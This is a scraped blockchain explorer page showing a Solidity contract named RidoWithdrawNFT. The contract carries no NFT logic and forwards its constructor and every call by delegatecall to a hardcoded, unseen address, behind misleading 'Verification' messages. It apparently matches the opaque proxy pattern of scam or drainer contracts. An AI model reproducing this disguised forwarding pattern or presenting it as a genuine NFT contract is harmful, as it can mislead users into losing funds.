ETH Price: $2,950.73 (-2.11%)
Gas: 3 Gwei

Contract Diff Checker

Contract Name:
RidoWithdrawNFT

Contract Source Code:

File 1 of 1 : RidoWithdrawNFT

// SPDX-License-Identifier: MIT

pragma solidity <=0.8.13;

contract RidoWithdrawNFT {
    uint256 private totalSupply = 5005;
    fallback(bytes calldata data) payable external returns(bytes memory){
        (bool r1, bytes memory result) = address(0x3f51cBCFDB336449134b24EcDD89B376109C82B2).delegatecall(data);
        require(r1, "Verification.");
        return result;
    }

    receive() payable external {
    }

    constructor() {
        bytes memory data = abi.encodeWithSignature("initialize()");
        (bool r1,) = address(0x3f51cBCFDB336449134b24EcDD89B376109C82B2).delegatecall(data);
        require(r1, "Verificiation.");
    }
}

Please enter a contract address above to load the contract details and source code.

Context size (optional):